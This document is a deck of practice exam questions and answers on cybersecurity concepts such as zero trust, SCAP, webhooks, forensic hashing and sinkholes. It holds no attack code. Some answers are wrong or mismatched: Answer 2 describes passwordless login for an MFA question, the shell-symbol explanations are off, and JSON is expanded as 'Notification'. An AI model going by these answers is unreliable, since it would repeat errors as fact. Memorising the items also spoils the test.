Deck3

Question 1

A hacktivist group claims responsibility for infecting a manufacturer’s systems by planting an infected USB drive at the company’s office. The manufacturer’s distributor, several vendors, and hundreds of customers were all eventually infected with the malware that stole important credential information.

Which term describes this attack strategy?

A)Cloud-based
B)Direct access
C)Supply-chain
D)Social media

Answer 1

A supply-chain attack is not an attack on a target directly but on a more vulnerable company or resource within its supply chain that helps the organization conduct business or create a product. An increasing number of hacks are being carried out this way.

Direct access is the most straightforward type of attack and usually the most preventable. It is a physical or local attack, such as an attacker exploiting an unlocked workstation and using a boot disk to install malicious tools or simply stealing a device.

In a cloud-based attack, hackers may try and exploit vulnerabilities in cloud-based web service providers to gain access to a tenant organization’s data.

Social media attacks occur when malware is attached to social media posts or presented as downloads on social media sites. At their most dangerous, hackers can make it so a compromised site automatically infects a vulnerable computer.

Question 2

In order to log onto a system, you must first complete a CAPTCHA, then enter a code that is sent to your cell phone via SMS. What is that code an example of?

A)Passwordless
B)Cloud access security broker
C)Multi-factor authentication
D)Single sign-on

Answer 2

Passwordless authentication provides alternative mechanisms to authenticate users, using items that do not have to be remembered by the user. Examples of passwordless authentication include hardware tokens, smart cards, biometrics, and one-time passcodes sent to a cell phone.

Question 3

CASB

Answer 3

A cloud access security broker (CASB) is a checkpoint where security policies are enforced, located between an organization’s users and its cloud providers. A CASB can ensure cloud security by comparing users, applications, and devices against multiple security policies.

Question 4

In security operations, which of the following would provide well-defined operational guidelines for processes such as incident response, security policy, vulnerability management, and security awareness?

A)Windows registry
B)Logging levels
C)System processes
D)System hardening

Answer 4

System processes provide well-defined operational guidelines for processes such as incident response, security policy, vulnerability management, and security awareness, to name a few. A Security Operations Center (SOC) operates 24x7 maintain the organization’s security posture. The abovementioned system processes provide the guidelines that the SOC uses for its operations.

Question 5

Windows Registry?

Answer 5

The Windows registry is a database that contains all the application settings and current configuration parameters for the hardware and software on a Windows system. Each machine running a Windows OS has a registry that contains keys (which identify applications, processes, hardware) and values (specific configuration data related to the key). For example, if a key was related to a printer, values associated with the key could include printing orientation, print history, default paper tray, and default paper size.

The Windows OS uses the registry database for storing all configuration settings. In Linux, each application and process has its own configuration file. The Linux file structure uses the /etc/ directory for configuration file locations.

Hardware architecture is also an important concept. If the hardware is not secure, it would be very difficult to build secure applications and databases and to have high availability. Physical access to critical hardware, such as servers, routers, wireless access points, and network switches, is often overlooked. It is not uncommon that administrative passwords are set to the default, firmware does not get updated, and encryption is not adequate for the device.

Question 6

Which of the following has a Policy Engine, a Policy Administrator, and a Policy Enforcement Point?

A)Personally identifiable information (PII)
B)Cardholder data
C)Data loss prevention
D)Zero trust

Answer 6

Zero-trust architecture consists of a Policy Engine, a Policy Administrator, and a Policy Enforcement Point. The goal of zero trust is to continuously monitor the authentication and authorization of devices, users, and processes. The Policy Engine is responsible for granting or denying access based primarily on policy, but other factors can be taken into consideration. The Policy Administrator decides to open or close the communication path from the requestor to the resource, based on the decision of the Policy Engine. The Policy Enforcement Point establishes and terminates the connections.

Question 7

Your company is governed by several regulations that state that you must use automated systems that provide CCE and CVE identifiers for vulnerability scans. Which of the following should you implement?

A)SCAP
B)SIEM
C)NAC
D)SNMP

Answer 7

You should implement Security Content Automation Protocol (SCAP), which provides Common Configuration Enumeration (CCE) and Common Vulnerabilities and Exposures (CVE) identifiers.

Question 8

The team is analyzing a shell script that was run on a server. How can they recognize comments in the script?

A)line starts with a #
B)line starts with $
C)line start with a !
D)line starts with a @

Answer 8

Comments are ignored by the shell. They typically begin with the hash symbol (#) and continue until the end of the line.

The exclamation mark (!) is used with the Equal relational operator. != means Not Equal and returns true if the two operands are not equal. Otherwise, it returns false.

The dollar sign ($) is used to return the value of the last executed command.

The at symbol (@) can be used with the $ symbol to pass all of the parameters to the script.

Question 9

Obtaining which of the following can reduce the likelihood of purchasing counterfeit equipment?

A)Fingerprint
B)OEM documentation
C)SLA
D)Hash value

Answer 9

One of the ways you can reduce the likelihood of purchasing counterfeit equipment is to insist on the inclusion of verifiable original equipment manufacturer (OEM) documentation. In many cases, this paperwork includes anti-counterfeiting features. Make sure you use the vendor website to verify all of the various identifying numbers in the documentation.

Question 10

You have quarantined an instance of malware and would like to execute the payload to see what it does without spreading it through the network. What tool or process could be used to do this safely?

A)Cuckoo Sandbox
B)email header analysis
C)DKIM
D)pattern recognition

Answer 10

Cuckoo Sandbox is used to investigate suspicious files or websites. It not only analyzes files and websites but also traces API calls, dumps any related network traffic, and analyzes the processes running in memory. When you execute a malicious payload in a sandbox, the sandbox allows it to run while preventing the spread of any activity generated by the malicious payload.

Question 11

You are a cyber security analyst. Your organization has several products and services implemented within their IT environment. Management finds it difficult to view security and operational metrics for all the products. You recommend that management approve implementing single pane of glass solution to resolve the visibility issue.

Which of the following statements is NOT true of implementing a single pane of glass solution?

A)It increases efficiency by eliminating the need to switch back and forth between separate IT operations management solutions.
B)It provides an easy-to-navigate GUI.

C)It provides a centralized display of security and operational metrics that is readily available to management.

D)It displays and sends data in real time from the centralized application whenever relevant events occur in the environment.

Answer 11

A single pane of glass solution does not display and send data in real time when relevant events occur in the environment. You would implement webhooks in an application to display and send data in real time when a relevant event occurs in the environment. Webhooks can be leveraged to automate certain workflows.

A single pane of glass solution provides a single management console that displays data from multiple sources. The glass in the term “single pane of glass” refers to a computer monitor or mobile screen where users can view meaningful data from multiple sources.

Question 12

You are assisting a senior forensics investigator with a crime scene. While you are watching, he runs the following command:

user@kaplan:~# md5sum /dev/pw3

He receives the following output:

9b98b637a132974e41e3c6ae1fc9fc96 /dev/pw3

What is the long string of values in the output called?

A)Initialization vector
B)Hash value
C)Salt value
D)Encryption key

Answer 12

That value is the hash value, and it was derived by running the file against the now-deprecated MD5 hashing algorithm. This algorithm generates this value based on the contents of the file or volume against which it was run. Its value is in providing a way to determine, at a later time, if the file or volume has changed. To validate an image, a hash is generated for both the original and the copy. If the hashes match, then the images are identical. Both hashes should be recorded as part of the forensic log for the investigation.

It is not an encryption key. Encryption keys are used to encipher a message. MD5 does not perform encryption. It generates a value that can be used to determine the integrity of the file or volume.

It is not an initialization vector (IV). These are values used within certain encryption algorithms to add randomness to the calculations to prevent patterns in the output that can be used to reverse-engineer the encryption key.

A salt value is random data that is used as an additional input to a one-way function that “hashes” a password or passphrase. It is used to make cracking the hash more difficult.

Question 13

Which network architecture concept allows for dynamic reconfiguration of a network as a reaction to changes in volume, types of traffic, and security incidents?

A)Secure Access Service Edge
B)Hybrid
C)Software-defined networking
D)On-premises

Answer 13

Software-defined networking (SDN) allows for dynamic reconfiguration of a network as a reaction to changes in volume, types of traffic, and security incidents.

On-premises network architecture allows an organization to maintain control of its architecture and resources by hosting it on-site. With on-premises, the organization can also host a private cloud on its hardware.

Hybrid cloud architecture is an environment where some items are stored in a public cloud and some items are stored in a private cloud. In short, a public cloud allows an organization to “rent space” (much like a tenant in an office building) from another organization in an Internet-accessible datacenter, place sharable resources in that space, and configure access to those resources. A private cloud is an Internet-accessible datacenter that serves only one tenant.

Secure Access Service Edge (SASE) is used to ensure security in a software-defined wide area network (SD-WAN) environment, particularly in a cloud environment. SASE is often associated with the zero-trust model.

Question 14

Your organization’s reputation is staked on a book it publishes yearly. When you perform data classification, how should you classify this book and its contents?

A)intellectual property
B)corporate confidential data
C)PHI
D)personally identifiable information

Answer 14

Intellectual property is a tangible or intangible asset to which the owner has exclusive rights. Intellectual property law is a group of laws that recognizes exclusive rights for creations of the mind. This includes books and music.

Question 15

Which of the following network architecture concepts consists of a Policy Engine, a Policy Administrator, and a Policy Enforcement point?

A)Hybrid
B)Zero-trust
C)Cloud
D)Secure Access Service Edge

Answer 15

Zero-trust architecture consists of a Policy Engine, a Policy Administrator, and a Policy Enforcement Point. The goal of zero trust is to continuously monitor the authentication and authorization of devices, users, and processes. The Policy Engine is responsible for granting or denying access based primarily on policy, but other factors can be taken into consideration. The Policy Administrator decides to open or close the communication path from the requestor to the resource, based on the decision of the Policy Engine. The Policy Enforcement Point establishes and terminates the connections.

Question 16

You are a cyber security consultant for your company. Developers are creating an e-commerce application with a trial version and a paid version. You must recommend a solution that will automatically update the user’s trial subscription to the paid version once the user makes the purchase and the payment is processed.

Which solution should you recommend?

A)Integrate webhooks that will update the user’s trial version to the premium version.

B)Integrate plugins that will update the user’s trial version to the premium version.

C)Integrate an API that will update the user’s trial version to the premium version.

D)Integrate applets that will update the user’s trial version to the premium version.

Answer 16

You should recommend integrating webhooks into the application that will automatically update the trial version to the paid version when the payment is successfully processed. The webhook will be triggered when the payment processor notifies the application that the payment is complete, and not in scenarios where the payment fails to process or the payment session times out.

Question 17

You have observed that your network has fended off breach attempts from the same IP address several times recently. Which of the following could you use to address the issue?

A)Strings
B)AbuseIPDB
C)VirusTotal
D)Joe Sandbox

Answer 17

AbuseIPDB is a project dedicated to helping combat the spread of hackers, spammers, and abusive activity on the Internet by providing a central blacklist for webmasters, system administrators, and other interested parties to report and find IP addresses that have been associated with malicious activity online. Like the WHOIS database, which can be searched for DNS domains with a bad reputation for sending malicious traffic, AbusePBD reports on IP addresses and ranges of addresses with a bad reputation for engaging in hacking attempts or other malicious behavior.

Question 18

Which of the following is NOT a consideration when establishing the confidence level in the findings of a vulnerability scan?

A)accuracy of scan results
B)relevance of scan results
C)cost of scan results
D)timeliness of scan results

Answer 18

While it is true that security initiatives, such as a vulnerability scan, must create value that exceeds the cost, the cost of obtaining the scan results is not a consideration when establishing the confidence level in the findings.

The accuracy of the results is perhaps the most important consideration when establishing the confidence level. Inaccurate results can lead to wasted effort on noncritical issues, while more critical issues are left unaddressed.

The relevance of the results is also consideration when establishing the confidence level because in some cases results may indicate an issue that, while present, is irrelevant. For example, a missing patch for SQL Server is irrelevant when the organization uses Oracle.

Finally, the timeliness of the results is a consideration. Older data may be less valuable than more recent data because there is more time to react to a new issue, while it may be that nothing can be done about an older issue.

Question 19

Which research source can help in discovering new vulnerabilities and potential threats in existing Internet standards?

A)TTPs
B)STIX
C)TAXII
D)RFCs

Answer 19

A Request for Comments (RFC) is often issued when a new technology or practice is suggested within the industry. It represents a call for peer review on the subject. RFCs are administered and issued by various bodies, among them the Internet Engineering Task Force (IETF) and the National Institutes of Standards and Technology (NIST).

Question 20

An organization recently suffered a data breach. When the issue was investigated, the organization found that a disgruntled employee concealed product release dates within an image file he sent to someone else. What is this process called?

A)double tagging
B)masquerading
C)data exfiltration
D)steganography

Answer 20

Steganography is the process of removing some bits of information about a graphic and inserting data that you want to hide in place of the missing graphic information. This swapping does not typically have a noticeable effect on the graphic, but it allows the sender to hide data that can be extracted later via the same application used to insert it into the graphic. The best defense against steganography is to periodically scan PCs for questionable software. The presence of steganography software on any system should be prohibited unless it is specifically required for business purposes.

Question 21

Several of the systems you manage are displaying odd behavior. You are trying to determine if the issue is host-related or application-related. Which of the following is a host-related issue?

A)anomalous activity
B)introduction of new accounts
C)unexpected output
D)registry changes

Answer 21

Changes to the registry or anomalies in the registry settings is a host-related issue, as these settings affect the entire system.

Question 22

Your company needs to ensure that all devices connecting to the network are prevented from introducing malware and other vulnerabilities into the network. This includes deploying patch management for systems and applications and hardening systems. What technique are you implementing?

A)System isolation
B)Endpoint security
C)Network segmentation
D)Sinkholes

Answer 22

You are implementing endpoint security. Endpoint security involves protecting the endpoints (workstations, printers, and so on) in the network, including protecting them from other endpoints that spend at least some of the time outside the LAN. This is done by verifying patches and updates before the device is allowed access to the network. Endpoint security also includes the process of hardening endpoints.

Question 23

Which process allows you to deploy, configure, and manage data centers through scripts?

A)Waterfall
B)IaC
C)Agile
D)Immutable systems
E)Baselining

Answer 23

Infrastructure as code (IaC) is the process of using definition and configuration files to provision and manage data centers. Automating this process through scripts can ensure that there is more control and less opportunity for error when deploying servers, as compared with manual configuration. IaC is the foundation for Secure DevOps. Secure Development Operations (Secure DevOps) means that security is built into all your development operations.

Question 24

Which of the following is NOT associated with public key infrastructure (PKI)?

A)Certificate store
B)Registration authority
C)Certificate authority
D)Single sign-on

Answer 24

Single sign-on (SSO) is not associated with PKI. It is a process that allows users to log on once to the network and thereafter not be required to issue another password to access resources.

Certificate authority (CA) is an element of PKI. The CA validates the entities identified in the certificate.

The registration authority (RA) authorizes certificates. The RA validates the user request for a certificate and directs the CA to issue the certificate.

The certificate store is used by applications running on a system to retrieve stored certificates, certificate trust lists, and certificate revocation lists.

Another element of PKI is the certificate database. This database stores information about the certificate, as well as the validity status and the validity period.

Question 25

Your company has engaged with a threat intelligence sharing organization. In which of the following areas would you identify and share your controls chosen to address issues?

A)vulnerability management
B)security engineering
C)incident response
D)detection and monitoring
E)risk management

Answer 25

Part of risk management is identifying mitigations, called controls, to address issues. Examples of the types of controls are:

Preventative controls: controls that stop something from occurring, such as locks.

Managerial controls: controls that specify acceptable practices within an organization, such as acceptable use policies.

Corrective controls: controls put in place to reduce the effect of an attack or other undesirable event, such as backups.

Question 26

Which of the following vulnerabilities is characterized by a user modifying a browser’s security settings to make it more convenient to visit websites?

A)Misconfiguration/weak configuration
B)Improper input handling
C)Improper error handling
D)Default configuration

Answer 26

If a user modifies a browser’s security settings to make it more convenient to visit websites, such as turning off pop-up blockers and anti-phishing controls, this is an example of a weak configuration. Misconfiguration and weak configurations can have a severe impact on the entire organization. Misconfiguration, such as not changing the default administrative user name or password, can also have a significant impact.

Question 27

Which of the following provides extra layers of security for administrator accounts and service accounts?

A)Passwordless
B)Federation
C)Privileged access management
D)Cloud access security broker

Answer 27

Privileged access management (PAM) is a process that provides extra protection for roles above the level of regular users, such as an administrator or a service account. If an account that is assigned special access is compromised, that breach can have a more significant impact than a breach of a regular user’s account.

Question 28

Which of the following has Firewall as a Service (FWaaS) as a component?

A)Network segmentation
B)Secure Access Service Edge
C)Software-defined networking
D)On-premises

Answer 28

Secure Access Service Edge (SASE) has Firewall as a Service (FWaaS) as one of its components. Other components include secure web gateways (SWG), a cloud access security broker (CASB), and zero trust network access (ZTNA). SASE is used to ensure security in a software-defined wide area network (SD-WAN) environment, particularly in a cloud environment. SASE is often associated with the zero-trust model.

Question 29

You are assembling tools that you need in your job as a security analyst. You must include a forensic suite tool. Which of the following will satisfy this requirement?

A)DD
B)Burp Suite
C)FTK
D)ZAP

Answer 29

FTK will satisfy the requirement of needing a forensic suite tool.

Burp Suite and Zed Attack Proxy (ZAP) are interception proxy tools. Another interception proxy tool is Vega.

DD is an imaging tool. While this type of tool is considered a forensics tool, it does not provide a forensic suite because it performs only one function, which is imaging.

Question 30

Your team has begun using user behavior analysis to identify potential malicious activity. Which of the following is NOT an example of behavior that might be uncovered using this technique?

A)communication attempts from unusual geographic locations
B)editing of user groups
C)user activity at odd hours
D)breaking the key on a hashed password

Answer 30

User behavior analysis and analytics will be of no help when a hacker breaks the key to a hashed password, which is one that has had a message digest value generated using a hashing algorithm like SHA. If the message digest value is identified, the hacker will be able to identify the password. You cannot directly turn a hashed value into the password, but you can work out what the password is if you continually generate hashes from passwords until you find one that matches.

Any abnormal user behavior can be evidence of a system compromise. Examples include:

Editing of user groups or other abnormal account activity
Communication attempts from unusual geographic locations or impossible travel
User activity at odd hours

Question 31

You are a cyber security consultant in your company. You are educating developers regarding the use of webhooks when developing applications.

Which of the following scenarios would not be a suitable use for webhooks?

A)Automatically forwarding customer payments from an e-commerce platform to the accounting department

B)Deleting or updating data on other systems or databases.

C)Sending an email to a developer to request a fix for a non-urgent issue.

D)Notifying the customer support team when customers raise a payment dispute

Answer 31

Webhooks would not be suitable for deleting or updating data on other systems or databases. An API is the interface of the application that permits other programs or applications to request, input, delete, or update data in the application. A webhook uses an HTTP POST message to communicate from one application’s API to another application’s API. The communication is triggered in response to a user-defined event that occurs in the webhook’s application.

APIs and webhooks are used to accomplish similar goals, but in different ways. While APIs programmatically direct an entity to create an order, webhooks inform an API that an event has occurred. The message is used to trigger an action in response, such as sending an email or creating a calendar event.

Question 32

Recently there was a DoS attack on one of the servers, which succeeded in taking the server down for three hours. You would like to deploy a solution that would allow you to detect a huge rush of traffic to a specific device and route it somewhere away from the device. What technique could you use?

A)Network segmentation
B)System isolation
C)Endpoint security
D)Sinkholes

Answer 32

You could use a sinkhole. A sinkhole is a routing mechanism that can route traffic from a device being flooded to a location where the traffic can be studied.

Question 33

Your team recently suffered several attacks that leveraged the use of programming and scripting languages. They are investigating these languages. Which of the following is a lightweight formatted script designed for data transfer in which data is represented in name/value pairs separated by a comma?

A)XML
B)Python
C)PowerShell
D)JavaScript Object Notification (JSON)

Answer 33

JSON is an open standard file and data interchange format that uses human-readable text to store and transmit data objects consisting of attribute-value pairs and arrays.